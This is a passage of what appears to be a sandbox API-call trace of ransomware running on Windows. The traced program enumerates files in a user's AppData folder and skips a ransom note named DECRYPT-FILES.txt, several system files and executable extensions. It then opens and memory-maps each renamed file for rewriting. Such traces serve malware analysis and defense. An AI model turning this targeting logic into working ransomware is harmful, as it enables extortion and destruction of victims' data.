HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a.LjQ5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akdbjfytmat.m4a.ljq5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.138] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=55637) returned 1 [0180.138] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.139] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.142] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.142] CloseHandle (hObject=0x268) returned 1 [0180.142] CloseHandle (hObject=0x264) returned 1 [0180.142] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.142] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x56decb60, ftCreationTime.dwHighDateTime=0x1d4ceae, ftLastAccessTime.dwLowDateTime=0x6c9c91a0, ftLastAccessTime.dwHighDateTime=0x1d4c65f, ftLastWriteTime.dwLowDateTime=0xaa184d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x109b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", cAlternateFileName="B5XSGJ~1.XPF")) returned 1 [0180.142] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="DECRYPT-FILES.txt") returned -1 [0180.142] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="autorun.inf") returned 1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="boot.ini") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="desktop.ini") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="ntuser.dat") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="iconcache.db") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="bootsect.bak") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="ntuser.dat.log") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="thumbs.db") returned -1 [0180.143] lstrcmpiW (lpString1="b5XS GJUXmYXlZvRSW-.mp3.XPfeB", lpString2="Bootfont.bin") returned -1 [0180.143] lstrlenW (lpString="b5XS GJUXmYXlZvRSW-.mp3.XPfeB") returned 29 [0180.143] lstrcmpiW (lpString1="XPfeB", lpString2="lnk") returned 1 [0180.143] lstrcmpiW (lpString1="XPfeB", lpString2="exe") returned 1 [0180.143] lstrcmpiW (lpString1="XPfeB", lpString2="sys") returned 1 [0180.143] lstrcmpiW (lpString1="XPfeB", lpString2="dll") returned 1 [0180.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.143] lstrlenW (lpString="b5XS GJUXmYXlZvRSW-.mp3.XPfeB") returned 29 [0180.143] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.143] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="b5XS GJUXmYXlZvRSW-.mp3.XPfeB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3.XPfeB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3.XPfeB" [0180.143] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\b5XS GJUXmYXlZvRSW-.mp3.XPfeB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\b5xs gjuxmyxlzvrsw-.mp3.xpfeb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.143] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=68019) returned 1 [0180.143] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.144] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.195] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.198] CloseHandle (hObject=0x268) returned 1 [0180.217] CloseHandle (hObject=0x264) returned 1 [0180.220] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.220] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x716f2750, ftCreationTime.dwHighDateTime=0x1d4c8db, ftLastAccessTime.dwLowDateTime=0x57b1a230, ftLastAccessTime.dwHighDateTime=0x1d4c74f, ftLastWriteTime.dwLowDateTime=0xaa1aaec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3537, dwReserved0=0x0, dwReserved1=0x0, cFileName="CXtBKJuR4xY5m c.swf.AQz6V3", cAlternateFileName="CXTBKJ~1.AQZ")) returned 1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="DECRYPT-FILES.txt") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="autorun.inf") returned 1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="boot.ini") returned 1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="desktop.ini") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="ntuser.dat") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="iconcache.db") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="bootsect.bak") returned 1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="ntuser.dat.log") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="thumbs.db") returned -1 [0180.220] lstrcmpiW (lpString1="CXtBKJuR4xY5m c.swf.AQz6V3", lpString2="Bootfont.bin") returned 1 [0180.220] lstrlenW (lpString="CXtBKJuR4xY5m c.swf.AQz6V3") returned 26 [0180.220] lstrcmpiW (lpString1="AQz6V3", lpString2="lnk") returned -1 [0180.220] lstrcmpiW (lpString1="AQz6V3", lpString2="exe") returned -1 [0180.220] lstrcmpiW (lpString1="AQz6V3", lpString2="sys") returned -1 [0180.220] lstrcmpiW (lpString1="AQz6V3", lpString2="dll") returned -1 [0180.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.220] lstrlenW (lpString="CXtBKJuR4xY5m c.swf.AQz6V3") returned 26 [0180.220] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.221] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="CXtBKJuR4xY5m c.swf.AQz6V3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf.AQz6V3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf.AQz6V3" [0180.221] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf.AQz6V3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cxtbkjur4xy5m c.swf.aqz6v3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.221] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=13623) returned 1 [0180.221] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.221] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.223] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.223] CloseHandle (hObject=0x268) returned 1 [0180.223] CloseHandle (hObject=0x264) returned 1 [0180.223] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.224] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc44fe630, ftCreationTime.dwHighDateTime=0x1d4c787, ftLastAccessTime.dwLowDateTime=0xac6a6050, ftLastAccessTime.dwHighDateTime=0x1d4d00a, ftLastWriteTime.dwLowDateTime=0xaa1f7180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x489c, dwReserved0=0x0, dwReserved1=0x0, cFileName="D2zhG8jS.swf.02fm6gn", cAlternateFileName="D2ZHG8~1.02F")) returned 1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="DECRYPT-FILES.txt") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="autorun.inf") returned 1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="boot.ini") returned 1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="desktop.ini") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="ntuser.dat") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="iconcache.db") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="bootsect.bak") returned 1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="ntuser.dat.log") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="thumbs.db") returned -1 [0180.224] lstrcmpiW (lpString1="D2zhG8jS.swf.02fm6gn", lpString2="Bootfont.bin") returned 1 [0180.224] lstrlenW (lpString="D2zhG8jS.swf.02fm6gn") returned 20 [0180.224] lstrcmpiW (lpString1="02fm6gn", lpString2="lnk") returned -1 [0180.224] lstrcmpiW (lpString1="02fm6gn", lpString2="exe") returned -1 [0180.224] lstrcmpiW (lpString1="02fm6gn", lpString2="sys") returned -1 [0180.224] lstrcmpiW (lpString1="02fm6gn", lpString2="dll") returned -1 [0180.224] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.224] lstrlenW (lpString="D2zhG8jS.swf.02fm6gn") returned 20 [0180.224] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.224] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="D2zhG8jS.swf.02fm6gn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf.02fm6gn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf.02fm6gn" [0180.224] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf.02fm6gn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d2zhg8js.swf.02fm6gn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.225] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=18588) returned 1 [0180.225] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.225] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.228] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.228] CloseHandle (hObject=0x268) returned 1 [0180.228] CloseHandle (hObject=0x264) returned 1 [0180.228] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.228] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.228] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.228] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeea172c0, ftCreationTime.dwHighDateTime=0x1d4cb4f, ftLastAccessTime.dwLowDateTime=0xf58c6ba0, ftLastAccessTime.dwHighDateTime=0x1d4c9ae, ftLastWriteTime.dwLowDateTime=0xaa21d2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe1d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DNJ0jH17yLgW1.gif.MLll", cAlternateFileName="DNJ0JH~1.MLL")) returned 1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="DECRYPT-FILES.txt") returned 1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="autorun.inf") returned 1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="boot.ini") returned 1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="desktop.ini") returned 1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="ntuser.dat") returned -1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="iconcache.db") returned -1 [0180.228] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="bootsect.bak") returned 1 [0180.229] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="ntuser.dat.log") returned -1 [0180.229] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="thumbs.db") returned -1 [0180.229] lstrcmpiW (lpString1="DNJ0jH17yLgW1.gif.MLll", lpString2="Bootfont.bin") returned 1 [0180.229] lstrlenW (lpString="DNJ0jH17yLgW1.gif.MLll") returned 22 [0180.229] lstrcmpiW (lpString1="MLll", lpString2="lnk") returned 1 [0180.229] lstrcmpiW (lpString1="MLll", lpString2="exe") returned 1 [0180.229] lstrcmpiW (lpString1="MLll", lpString2="sys") returned -1 [0180.229] lstrcmpiW (lpString1="MLll", lpString2="dll") returned 1 [0180.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.229] lstrlenW (lpString="DNJ0jH17yLgW1.gif.MLll") returned 22 [0180.229] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.229] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="DNJ0jH17yLgW1.gif.MLll" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif.MLll") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif.MLll" [0180.229] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif.MLll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dnj0jh17ylgw1.gif.mlll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.229] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=57817) returned 1 [0180.229] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.229] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.231] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.231] CloseHandle (hObject=0x268) returned 1 [0180.231] CloseHandle (hObject=0x264) returned 1 [0180.231] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.231] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecc3fb80, ftCreationTime.dwHighDateTime=0x1d4d3e7, ftLastAccessTime.dwLowDateTime=0xeed3cfd0, ftLastAccessTime.dwHighDateTime=0x1d4d212, ftLastWriteTime.dwLowDateTime=0xaa2695a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb53b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ebf4.png.3wy7f", cAlternateFileName="EBF4PN~1.3WY")) returned 1 [0180.231] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="DECRYPT-FILES.txt") returned 1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="autorun.inf") returned 1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="boot.ini") returned 1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="desktop.ini") returned 1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="ntuser.dat") returned -1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="iconcache.db") returned -1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="bootsect.bak") returned 1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="ntuser.dat.log") returned -1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="thumbs.db") returned -1 [0180.232] lstrcmpiW (lpString1="ebf4.png.3wy7f", lpString2="Bootfont.bin") returned 1 [0180.232] lstrlenW (lpString="ebf4.png.3wy7f") returned 14 [0180.232] lstrcmpiW (lpString1="3wy7f", lpString2="lnk") returned -1 [0180.232] lstrcmpiW (lpString1="3wy7f", lpString2="exe") returned -1 [0180.232] lstrcmpiW (lpString1="3wy7f", lpString2="sys") returned -1 [0180.232] lstrcmpiW (lpString1="3wy7f", lpString2="dll") returned -1 [0180.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.232] lstrlenW (lpString="ebf4.png.3wy7f") returned 14 [0180.232] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.232] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ebf4.png.3wy7f" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png.3wy7f") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png.3wy7f" [0180.232] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png.3wy7f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ebf4.png.3wy7f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.233] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=46395) returned 1 [0180.233] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.233] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.246] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.259] CloseHandle (hObject=0x268) returned 1 [0180.259] CloseHandle (hObject=0x264) returned 1 [0180.259] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.259] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34a639f0, ftCreationTime.dwHighDateTime=0x1d4ce33, ftLastAccessTime.dwLowDateTime=0x2a4e0890, ftLastAccessTime.dwHighDateTime=0x1d4c5d5, ftLastWriteTime.dwLowDateTime=0xaa28f700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xeb26, dwReserved0=0x0, dwReserved1=0x0, cFileName="egrSO1kCzE_TcvnPlFJT.png.PTVsU", cAlternateFileName="EGRSO1~1.PTV")) returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="DECRYPT-FILES.txt") returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="autorun.inf") returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="boot.ini") returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="desktop.ini") returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="ntuser.dat") returned -1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="iconcache.db") returned -1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="bootsect.bak") returned 1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="ntuser.dat.log") returned -1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="thumbs.db") returned -1 [0180.259] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png.PTVsU", lpString2="Bootfont.bin") returned 1 [0180.259] lstrlenW (lpString="egrSO1kCzE_TcvnPlFJT.png.PTVsU") returned 30 [0180.259] lstrcmpiW (lpString1="PTVsU", lpString2="lnk") returned 1 [0180.259] lstrcmpiW (lpString1="PTVsU", lpString2="exe") returned 1 [0180.259] lstrcmpiW (lpString1="PTVsU", lpString2="sys") returned -1 [0180.259] lstrcmpiW (lpString1="PTVsU", lpString2="dll") returned 1 [0180.259] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.259] lstrlenW (lpString="egrSO1kCzE_TcvnPlFJT.png.PTVsU") returned 30 [0180.259] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.259] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="egrSO1kCzE_TcvnPlFJT.png.PTVsU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png.PTVsU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png.PTVsU" [0180.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.260] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png.PTVsU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\egrso1kcze_tcvnplfjt.png.ptvsu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.260] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=60198) returned 1 [0180.260] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.260] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.266] UnmapViewOfFile 